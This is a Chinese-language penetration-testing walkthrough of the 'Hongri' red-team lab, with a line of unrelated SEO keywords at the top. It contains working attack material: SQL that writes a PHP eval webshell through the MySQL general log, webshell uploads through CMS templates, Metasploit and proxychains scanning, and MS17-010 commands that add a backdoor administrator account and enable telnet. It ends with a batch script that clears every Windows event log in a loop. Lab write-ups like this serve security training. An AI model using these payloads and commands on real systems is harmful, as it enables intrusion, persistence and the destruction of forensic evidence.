成都网站建设推广详,wordpress主体首页空,自己做公司网站难吗,上网站 ftp目录 下载地址红日靶场基本环境配置攻击思维导图网络结构 系统环境配置外网打点对phpmyadmin渗透对zzcms的渗透#xff1a;getshell失败案例getshell成功案例模版制作#xff1a;应用导入上传#xff1a;其他方式#xff1a; 内网渗透信息收集msf上线#xff1a;搭建隧道内… 目录 下载地址红日靶场基本环境配置攻击思维导图网络结构 系统环境配置外网打点对phpmyadmin渗透对zzcms的渗透getshell失败案例getshell成功案例模版制作应用导入上传其他方式 内网渗透信息收集msf上线搭建隧道内网探测上线cs横向移动成功msf横向尝试失败了 换了ms17-010命令执行pocftp匿名登录失败痕迹清理bat参考链接 下载地址
下载地址
红日靶场
红队实战系列主要以真实企业环境为实例搭建一系列靶场通过练习、视频教程、博客三位一体学习。另外本次实战完全模拟ATTCK攻击链路进行搭建开成完整闭环。后续也会搭建真实APT实战环境从实战中成长。关于环境可以模拟出各种各样实战路线目前给出作者实战的一套攻击实战路线如下虚拟机所有统一密码hongrisec2019
一、环境搭建 1.环境搭建测试 2.信息收集
二、漏洞利用 3.漏洞搜索与利用 4.后台Getshell上传技巧 5.系统信息收集 6.主机密码收集
三、内网搜集 7.内网–继续信息收集 8.内网攻击姿势–信息泄露 9.内网攻击姿势-MS08-067 10.内网攻击姿势-SMB远程桌面口令猜测 11.内网攻击姿势-Oracle数据库TNS服务漏洞 12.内网攻击姿势-RPC DCOM服务漏洞
四、横向移动 13.内网其它主机端口-文件读取 14.内网其它主机端口-redis 15.内网其它主机端口-redis Getshell 16.内网其它主机端口-MySQL数据库 17.内网其它主机端口-MySQL提权
五、构建通道 18.内网其它主机端口-代理转发
六、持久控制 19.域渗透-域成员信息收集 20.域渗透-基础服务弱口令探测及深度利用之powershell 21.域渗透-横向移动[wmi利用] 22.域渗透-C2命令执行 23.域渗透-利用DomainFronting实现对beacon的深度隐藏 24.域渗透-域控实现与利用
七、痕迹清理 25、日志清理
基本环境配置 攻击思维导图 网络结构
主机IP网卡Kali Linux192.168.200.*NATWindwos7192.168.200.* /192.168.52.*NAT/VMnet2Win2k3192.168.52.*VMnet2仅主机Windows192.168.52.*VMnet2仅主机
备注按照自己喜好可以设置NAT网卡和vmnet仅主机模式都行因为windows7只要主机能够通信就行。 添加一个vmnet2网卡仅主机模式用于内网域环境通信
点击应用保存
系统环境配置
windwos7使用双网卡 我这已经添加 启动靶机windows7 密码:hongrisec2019 启动其他两台域控制器环境 测试通信 查看域控制器环境 ping注意这里不能pingwindows7禁ping
启动windows7 的web环境 关闭防火墙或者开放80端口
到这里就可以开始渗透测试了
外网打点
目标192.168.200.128 直接扫全端口 还有永恒之蓝如果防火墙开启应该就没有了。
发现80和3306端口开放 访问网站发现phpstudy探针系统为windows7 这里看到www目录的文件位置 扫描一下目录 一些敏感文件 phpmyadmin的版本 对phpmyadmin渗透
测试弱密码 root root 没想到这么简单就进来了
因为版本很多已知漏洞无法使用有一些POChttps://www.exploit-db.com/exploits/25003 这里用常用方法getshellhttps://www.freebuf.com/articles/web/226240.html 收集到信息 show variables like %general%;general_log日志保存状态这里为off
general_log_file日志保存路径开启日志保存并配置保存路径 set global general_log ON; set global general_log_file C:/phpStudy/WWW/log.php;select ?php eval($_POST[pwd]); ?;打开蚁剑连接 对zzcms的渗透 访问一下 尝试注册功能 成功 查找上传点 测试一下上传 先测试一下 上传图片成功但是需要审核这里就不能上传了找一下后台登录点
没注意这里 这里提示我们后台位置和账户密码大概漏洞存在与后台可能作者是想让我们从cms上进行拿shell这里也可将备份文件下载到本地进行代码审计
getshell失败案例
寻找上传点 图集上传点 寻找上传文件位置没找到
getshell成功案例
模版制作
模版文件这好像可以直接添加php文件 文件里面找到
应用导入上传 虽然我们不知道cms的应用怎么写的直接上传一个shell.php文件 打包换个名字上传 把member模块停用启用test
寻找上传文件
连接测试 这里我写错马了重新上传了一个test1连接
其他方式
可以通过3306登录获取shell我们在下载模板文件时可以看到数据库的用户名密码 这里没有进行测试 大家有兴趣可以尝试获取也可以通过网上披露的已知漏洞进行攻击也可以做深入的代码审计方法很多包括使用永痕之蓝漏洞msf可以直接提到system权限这里不在继续。
内网渗透
传个fscan扫一扫
信息收集
判断主机是否加入域
方法一
net time /domain
#如果当前主机处于工作组中未加入域则显示找不到域控制器
#加入了域且当前用户为本地用户包括本地管理员则显示拒绝访问
加入了域且当前用户域用户则显示域控的时间方法二
net config workstation
#如果命令返回信息中包含“工作站域”则说明该计算机已经加入了域。看下网段发现内网网段
方法三
echo %userdomain%这里可以看一下windows7使用杀软没 没有识别到杀软可以做msf上线或者做内网穿透或者冰蝎隧道不推荐看个人选择也可以上线cs做横向移动或者权限维持这里我选择做简单的权限维持。
msf上线
生成msf马
kali监听 上传马 执行 提权getsystem
搭建隧道
background
使用sockes模块
use auxiliary/server/socks_proxy
set srvport 1050
run配置 vim /etc/proxychains4.conf 添加
内网探测
使用nmap探测一下存在防火墙
proxychains nmap -PN --script smb-vuln* -p139,445 192.168.52.138
proxychains nmap -PN --script smb-vuln* -p139,445 192.168.52.141上线cs横向移动成功
生成cs马
上传运行 提权 探测 抓取明文密码这里我密码改了就不放出来了 添加smb的监听因为我们拿到内网的一台权限了使用这台上面的权限横向到其他两台上 添加监听 选择win7和我们加的监听 另一台同样操作成功获取内网权限 msf横向尝试失败了 代理后直接可以横向移动
上面fscna探测出网段存在ms17-010直接利用利用失败了 怀疑是防火墙拦截了后面关了防火墙也不行 我这想用msf上线前面msf上线失败了因为kali的sock5代理有点问题我这用cs的代理 使用kali做socks4的代理
换了ms17-010命令执行poc
使用ms17-010命令执行poc
//这里直接创建用户julien密码julien123
use auxiliary/admin/smb/ms17_010_command
set COMMAND net user
set RHOST 192.168.52.138
set COMMAND net user julien julien123
run
//将hack用户添加到管理员组
set COMMAND net localgroup administrators julien /add
run
set COMMAND sc config tlntsvr start auto
run
set COMMAND net start telnet
run
set COMMAND netstat -an
run发现138这台23端口无法打开命令执行有问题换成141这台远程是可以的但是一直提示我密码错误不知道什么原因
ftp匿名登录失败
use auxiliary/scanner/ftp/anonymous
set rhosts 192.168.52.141
run不存在后面版本 但不能写入本次渗透就做到这里
痕迹清理bat
这里不在操作
echo off
mode con cols40 lines7
color 89
title 自动清理日志
:up
echo 清理中 请稍等...
FOR /F delims %%I IN (WEVTUTIL EL) DO (WEVTUTIL CL %%I)
cls
for /L %%a in (10,-1,0
) do (
echo ----------------------------------------
echo 每10分钟清理一次
echo ----------------------------------------
echo %%a 分钟后开始清理
echo ----------------------------------------
ping -n 60 localhost 1nul 2nul
cls
)
goto up参考链接
https://www.freebuf.com/articles/web/324441.html https://www.freebuf.com/articles/web/226240.html